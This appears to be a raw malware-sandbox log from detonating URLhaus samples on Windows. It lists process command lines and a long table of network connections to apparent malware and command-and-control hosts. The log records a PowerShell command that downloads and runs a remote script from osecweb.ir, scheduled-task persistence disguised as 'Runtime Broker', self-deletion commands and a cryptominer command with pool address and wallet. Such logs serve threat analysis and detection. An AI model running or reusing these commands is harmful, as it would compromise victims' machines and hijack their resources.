"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe"
C:\Users\Admin\Downloads\UrlHausFiles\ew.exe
"C:\Users\Admin\Downloads\UrlHausFiles\ew.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
C:\Users\Admin\Downloads\UrlHausFiles\client.exe
"C:\Users\Admin\Downloads\UrlHausFiles\client.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5936 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ClientRun.exe
C:\Users\Admin\Downloads\UrlHausFiles\file.exe
"C:\Users\Admin\Downloads\UrlHausFiles\file.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')
C:\Program Files (x86)\seetrol\client\SeetrolClient.exe
"C:\Program Files (x86)\seetrol\client\SeetrolClient.exe"
C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\System32\ipconfig.exe" /flushdns
C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe
"C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\DGDAEHCBGIIJ" & exit
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,16311634359720674468,13576369252637091892,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5200 /prefetch:8
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe
"C:\Users\Admin\Downloads\UrlHausFiles\inst77player_1.0.0.1.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\Downloads\UrlHausFiles\file.exe" >> NUL
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe
"C:\Users\Admin\Downloads\UrlHausFiles\Registry.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe
"C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Runtime Broker" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe" /rl HIGHEST /f
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 85.31.47.143:3333 -a rx -k -u KAS:kaspa:qqjn2sfatk0dmj0x47yns4xlyp3avwp46mhum864y5kc3hcrajwy7v5npvpn8.RIG_CPU -p x --cpu-max-threads-hint=50
C:\Windows\system32\schtasks.exe
SchTasks /Create /SC ONLOGON /TN "my dr" /TR "d:\net\dr\dr.bat" /f
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | urlhaus.abuse.ch | udp |
| US | 151.101.66.49:443 | urlhaus.abuse.ch | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.66.101.151.in-addr.arpa | udp |
| N/A | 127.0.0.1:60079 | N/A | tcp |
| US | 8.8.8.8:53 | 73.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | cdn.chuk.cz | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | utorrent-backup-server4.top | udp |
| US | 8.8.8.8:53 | utorrent-backup-server3.top | udp |
| CN | 139.196.31.48:14417 | N/A | tcp |
| CN | 139.196.31.48:2324 | N/A | tcp |
| JP | 121.1.252.90:80 | 121.1.252.90 | tcp |
| CN | 114.215.27.238:2324 | N/A | tcp |
| CN | 101.229.61.157:8072 | N/A | tcp |
| CN | 114.215.27.238:8100 | N/A | tcp |
| CN | 110.90.9.121:8072 | N/A | tcp |
| CN | 114.215.27.238:8072 | N/A | tcp |
| CN | 61.144.96.138:888 | N/A | tcp |
| CH | 138.188.36.82:80 | 138.188.36.82 | tcp |
| TR | 5.26.97.52:88 | 5.26.97.52 | tcp |
| JP | 122.31.166.101:80 | 122.31.166.101 | tcp |
| CH | 138.188.34.220:80 | 138.188.34.220 | tcp |
| IN | 111.118.250.244:80 | 111.118.250.244 | tcp |
| CA | 76.11.16.231:80 | 76.11.16.231 | tcp |
| TR | 178.242.54.178:80 | 178.242.54.178 | tcp |
| US | 75.18.210.21:80 | 75.18.210.21 | tcp |
| DE | 62.216.196.186:80 | 62.216.196.186 | tcp |
| HK | 219.77.72.53:80 | N/A | tcp |
| BR | 179.89.224.192:80 | 179.89.224.192 | tcp |
| CA | 99.233.83.22:80 | 99.233.83.22 | tcp |
| MO | 202.175.60.117:80 | 202.175.60.117 | tcp |
| FR | 80.15.103.89:80 | 80.15.103.89 | tcp |
| CN | 110.40.250.173:2324 | N/A | tcp |
| CN | 113.85.101.199:81 | N/A | tcp |
| US | 67.190.47.69:8081 | 67.190.47.69 | tcp |
| CN | 124.70.36.56:80 | N/A | tcp |
| IT | 93.47.199.117:80 | 93.47.199.117 | tcp |
| TW | 122.116.26.47:4080 | 122.116.26.47 | tcp |
| KR | 121.142.127.237:8605 | 121.142.127.237 | tcp |
| CN | 121.235.184.125:9000 | N/A | tcp |
| TW | 122.116.26.47:8443 | 122.116.26.47 | tcp |
| CN | 61.183.16.127:14417 | N/A | tcp |
| CN | 58.208.14.94:88 | N/A | tcp |
| TR | 178.242.54.178:88 | 178.242.54.178 | tcp |
| KR | 218.155.74.6:7070 | 218.155.74.6 | tcp |
| CN | 150.158.146.215:80 | N/A | tcp |
| CN | 49.81.40.231:111 | N/A | tcp |
| BR | 187.59.102.238:9090 | 187.59.102.238 | tcp |
| CN | 111.42.156.130:8000 | N/A | tcp |
| CN | 49.81.203.0:111 | N/A | tcp |
| KR | 222.104.204.78:8000 | 222.104.204.78 | tcp |
| BR | 189.61.50.98:8080 | 189.61.50.98 | tcp |
| US | 159.250.122.151:8081 | 159.250.122.151 | tcp |
| KR | 59.19.185.137:8602 | 59.19.185.137 | tcp |
| CN | 47.103.126.166:8072 | N/A | tcp |
| ES | 37.13.48.49:80 | 37.13.48.49 | tcp |
| US | 68.59.153.1:49274 | 68.59.153.1 | tcp |
| HK | 149.88.73.206:80 | 149.88.73.206 | tcp |
| US | 141.155.36.213:41790 | 141.155.36.213 | tcp |
| CA | 184.145.33.5:80 | 184.145.33.5 | tcp |
| CN | 43.241.17.145:8899 | N/A | tcp |
| KR | 121.154.20.150:80 | 121.154.20.150 | tcp |
| US | 96.250.166.185:88 | 96.250.166.185 | tcp |
| US | 24.252.169.236:80 | 24.252.169.236 | tcp |
| CA | 76.67.131.51:80 | 76.67.131.51 | tcp |
| MX | 187.144.154.105:80 | 187.144.154.105 | tcp |
| CA | 76.68.62.152:80 | 76.68.62.152 | tcp |
| CA | 99.234.132.85:80 | 99.234.132.85 | tcp |
| MX | 187.225.233.208:80 | 187.225.233.208 | tcp |
| KR | 14.37.138.88:8602 | 14.37.138.88 | tcp |
| CA | 142.67.169.45:80 | 142.67.169.45 | tcp |
| BE | 109.137.108.215:8083 | 109.137.108.215 | tcp |
| US | 166.145.98.1:80 | 166.145.98.1 | tcp |
| FR | 109.210.138.197:80 | 109.210.138.197 | tcp |
| TR | 5.26.174.234:80 | 5.26.174.234 | tcp |
| NL | 85.31.47.135:80 | 85.31.47.135 | tcp |
| BG | 87.121.86.16:80 | utorrent-backup-server3.top | tcp |
| BG | 87.121.86.206:80 | 87.121.86.206 | tcp |
| BG | 87.121.86.206:443 | tcp | |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| RU | 31.41.244.11:80 | 31.41.244.11 | tcp |
| US | 158.101.35.62:9000 | 158.101.35.62 | tcp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | security-service-api-link.cc | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | win-network-checker.cc | udp |
| GB | 20.26.156.215:80 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | utorrent-backup-server5.top | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| GB | 20.26.156.215:80 | github.com | tcp |
| US | 172.67.204.246:443 | cdn.chuk.cz | tcp |
| US | 8.8.8.8:53 | update-checker-status.cc | udp |
| CN | 117.50.194.20:80 | tcp | |
| CN | 60.29.43.10:8072 | tcp | |
| ES | 178.156.109.69:81 | 178.156.109.69 | tcp |
| KR | 112.217.207.130:80 | 112.217.207.130 | tcp |
| CN | 36.138.125.70:8089 | tcp | |
| JP | 115.37.8.16:80 | 115.37.8.16 | tcp |
| VE | 167.250.49.155:80 | 167.250.49.155 | tcp |
| DO | 181.36.153.151:81 | 181.36.153.151 | tcp |
| NL | 194.122.165.149:80 | 194.122.165.149 | tcp |
| JP | 18.181.154.24:80 | 18.181.154.24 | tcp |
| NL | 194.122.191.15:90 | 194.122.191.15 | tcp |
| ES | 94.76.156.101:280 | 94.76.156.101 | tcp |
| NL | 83.87.76.41:80 | 83.87.76.41 | tcp |
| BG | 87.121.86.16:80 | update-checker-status.cc | tcp |
| US | 8.8.8.8:53 | cfs7.blog.daum.net | udp |
| BG | 87.121.86.16:80 | update-checker-status.cc | tcp |
| US | 8.8.8.8:53 | qiniuyunxz.yxflzs.com | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.86.121.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.86.121.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.47.31.85.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.103.15.80.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.138.210.109.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.196.216.62.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.199.47.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.34.188.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.36.155.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.244.41.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.166.250.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.48.13.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.131.67.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.33.145.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.169.67.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.62.68.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.169.252.24.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.16.11.76.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.132.234.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.97.26.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.174.26.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.83.233.99.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.54.242.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.153.59.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.98.145.166.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.122.250.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.47.190.67.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.204.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.35.101.158.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.76.87.83.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.109.156.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.156.76.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.210.18.75.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.36.188.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.154.144.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | monastery.mlnk.net | udp |
| US | 8.8.8.8:53 | download.caihong.com | udp |
| US | 8.8.8.8:53 | www.xn--on3b15m2lco2u.com | udp |
| US | 8.8.8.8:53 | 208.233.225.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.50.61.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.224.89.179.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.191.122.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.60.175.202.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.72.77.219.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.153.36.181.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.252.1.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.74.155.218.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.127.142.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.185.19.59.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.204.104.222.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.26.116.122.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.49.250.167.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.166.31.122.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.138.37.14.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 150.20.154.121.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.154.181.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.73.88.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.8.37.115.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.207.217.112.in-addr.arpa | udp |
| CZ | 77.240.97.71:81 | 77.240.97.71 | tcp |
| CN | 183.60.150.17:80 | qiniuyunxz.yxflzs.com | tcp |
| BG | 87.121.86.16:80 | update-checker-status.cc | tcp |
| BG | 88.213.212.10:80 | monastery.mlnk.net | tcp |
| BG | 87.121.86.16:80 | update-checker-status.cc | tcp |
| BG | 87.121.86.16:80 | update-checker-status.cc | tcp |
| KR | 211.231.99.68:80 | cfs7.blog.daum.net | tcp |
| BG | 87.121.86.16:80 | update-checker-status.cc | tcp |
| CN | 111.6.202.202:80 | download.caihong.com | tcp |
| KR | 221.139.49.8:80 | www.xn--on3b15m2lco2u.com | tcp |
| US | 8.8.8.8:53 | 71.97.240.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.212.213.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.49.139.221.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.99.231.211.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.165.122.194.in-addr.arpa | udp |
| HK | 43.132.12.146:9000 | 43.132.12.146 | tcp |
| US | 8.8.8.8:53 | cd.textfiles.com | udp |
| US | 8.8.8.8:53 | 238.102.59.187.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.12.132.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | frojbdawmiojfg.sytes.net | udp |
| LV | 198.181.163.35:4410 | frojbdawmiojfg.sytes.net | tcp |
| CN | 47.94.196.131:80 | tcp | |
| TH | 103.230.121.82:80 | 103.230.121.82 | tcp |
| US | 8.8.8.8:53 | update.cg100iii.com | udp |
| JP | 141.147.155.36:8888 | 141.147.155.36 | tcp |
| US | 208.86.224.90:80 | cd.textfiles.com | tcp |
| VN | 103.110.33.188:80 | 103.110.33.188 | tcp |
| CA | 50.65.169.30:81 | 50.65.169.30 | tcp |
| GB | 163.181.154.238:80 | update.cg100iii.com | tcp |
| US | 8.8.8.8:53 | 82.121.230.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.154.181.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.224.86.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.169.65.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.155.147.141.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.33.110.103.in-addr.arpa | udp |
| TH | 58.137.135.190:8080 | 58.137.135.190 | tcp |
| US | 8.8.8.8:53 | 190.135.137.58.in-addr.arpa | udp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | pivko.sbs | udp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| CN | 113.106.6.106:14319 | tcp | |
| US | 8.8.8.8:53 | cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net | udp |
| US | 8.8.8.8:53 | ns.smallsrv.com | udp |
| US | 8.8.8.8:53 | paytest.infinitegalaxy.cn | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | 137.8.203.116.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| CN | 112.33.27.73:443 | tcp | |
| CN | 112.124.28.233:5566 | tcp | |
| US | 8.8.8.8:53 | down.pcclear.com | udp |
| US | 8.8.8.8:53 | 360down7.miiyun.cn | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| GB | 82.31.159.47:80 | cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net | tcp |
| RU | 46.17.104.173:80 | ns.smallsrv.com | tcp |
| CN | 117.50.95.62:9880 | paytest.infinitegalaxy.cn | tcp |
| US | 8.8.8.8:53 | epei77.direct.quickconnect.to | udp |
| US | 8.8.8.8:53 | 47.159.31.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.104.17.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rl.ammyy.com | udp |
| NL | 188.42.129.148:80 | rl.ammyy.com | tcp |
| DE | 136.243.104.235:443 | tcp | |
| US | 8.8.8.8:53 | 148.129.42.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.104.243.136.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | mohibkal.publicvm.com | udp |
| NL | 82.168.179.78:1978 | mohibkal.publicvm.com | tcp |
| GB | 172.217.16.228:443 | www.google.com | udp |
| US | 8.8.8.8:53 | 42.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.178.14:443 | clients2.google.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 216.58.201.97:443 | clients2.googleusercontent.com | tcp |
| US | 8.8.8.8:53 | docs.google.com | udp |
| GB | 142.250.187.206:443 | docs.google.com | tcp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 68.108.119.30:22420 | 68.108.119.30 | tcp |
| US | 8.8.8.8:53 | nerve.untergrund.net | udp |
| KR | 211.110.226.148:80 | down.pcclear.com | tcp |
| CN | 218.12.76.158:80 | 360down7.miiyun.cn | tcp |
| CN | 47.120.46.210:80 | tcp | |
| CN | 110.40.32.156:80 | qiniuyunxz.yxflzs.com | tcp |
| CN | 111.6.201.155:80 | download.caihong.com | tcp |
| US | 8.8.8.8:53 | server.toeicswt.co.kr | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.119.108.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.226.110.211.in-addr.arpa | udp |
| N/A | 127.0.0.1:9223 | tcp | |
| N/A | 127.0.0.1:9223 | tcp | |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| KR | 218.147.147.172:80 | epei77.direct.quickconnect.to | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| LV | 198.181.163.35:4410 | frojbdawmiojfg.sytes.net | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | 172.147.147.218.in-addr.arpa | udp |
| VN | 103.167.89.125:80 | 103.167.89.125 | tcp |
| US | 8.8.8.8:53 | 1717.1000uc.com | udp |
| CN | 203.2.65.29:8088 | tcp | |
| US | 8.8.8.8:53 | elisans.novayonetim.com | udp |
| GB | 82.31.159.47:80 | cpc138130-hatf10-2-0-cust814.9-3.cable.virginm.net | tcp |
| US | 8.8.8.8:53 | media.githubusercontent.com | udp |
| US | 8.8.8.8:53 | safe.ywxww.net | udp |
| US | 8.8.8.8:53 | utorrent-backup-server.top | udp |
| US | 8.8.8.8:53 | www.333zz.top | udp |
| KR | 221.143.49.222:80 | 221.143.49.222 | tcp |
| US | 24.93.22.147:8081 | 24.93.22.147 | tcp |
| US | 166.166.188.230:80 | 166.166.188.230 | tcp |
| AT | 81.10.240.105:80 | 81.10.240.105 | tcp |
| RU | 193.233.48.194:80 | 193.233.48.194 | tcp |
| CN | 49.232.126.36:9000 | tcp | |
| US | 68.178.207.33:8000 | 68.178.207.33 | tcp |
| MA | 102.53.15.54:80 | 102.53.15.54 | tcp |
| IN | 43.240.65.55:81 | 43.240.65.55 | tcp |
| DE | 146.0.42.82:80 | 146.0.42.82 | tcp |
| CN | 106.42.31.65:8088 | tcp | |
| KW | 178.61.160.6:5001 | 178.61.160.6 | tcp |
| CN | 42.193.42.92:80 | tcp | |
| DE | 185.254.96.92:80 | 185.254.96.92 | tcp |
| US | 8.8.8.8:53 | a12xxx1.oss-cn-hongkong.aliyuncs.com | udp |
| US | 8.8.8.8:53 | osecweb.ir | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | a19ccc1.oss-cn-hongkong.aliyuncs.com | udp |
| US | 8.8.8.8:53 | karoonpc.com | udp |
| US | 8.8.8.8:53 | src1.minibai.com | udp |
| US | 8.8.8.8:53 | desquer.ens.uabc.mx | udp |
| US | 8.8.8.8:53 | 82.42.0.146.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.96.254.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.15.53.102.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.240.10.81.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.48.233.193.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.65.240.43.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.22.93.24.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.160.61.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.207.178.68.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.188.166.166.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.89.167.103.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.49.143.221.in-addr.arpa | udp |
| US | 170.250.53.236:80 | 170.250.53.236 | tcp |
| DE | 185.88.60.242:80 | nerve.untergrund.net | tcp |
| KR | 210.116.108.238:80 | server.toeicswt.co.kr | tcp |
| US | 8.8.8.8:53 | softdl.360tpcdn.com | udp |
| US | 8.8.8.8:53 | www.maxmoney.com | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | 242.60.88.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | d.kpzip.com | udp |
| US | 8.8.8.8:53 | 236.53.250.170.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.108.116.210.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| UA | 185.156.72.65:80 | 185.156.72.65 | tcp |
| US | 8.8.8.8:53 | 65.72.156.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.ly.9377.com | udp |
| NL | 4.180.120.64:8000 | 4.180.120.64 | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| US | 8.8.8.8:53 | 64.120.180.4.in-addr.arpa | udp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | nw-umwatson.events.data.microsoft.com | udp |
| US | 20.42.65.92:443 | nw-umwatson.events.data.microsoft.com | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 8.8.8.8:53 | global.pcclear.com | udp |
| KR | 114.108.160.134:80 | global.pcclear.com | tcp |
| N/A | 127.0.0.1:9223 | tcp | |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| DE | 116.203.8.137:443 | pivko.sbs | tcp |
| US | 166.150.43.236:80 | 166.150.43.236 | tcp |
| US | 185.199.109.133:443 | media.githubusercontent.com | tcp |
| CN | 60.191.236.246:820 | safe.ywxww.net | tcp |
| HK | 47.79.66.205:80 | a12xxx1.oss-cn-hongkong.aliyuncs.com | tcp |
| TR | 176.53.14.120:80 | elisans.novayonetim.com | tcp |
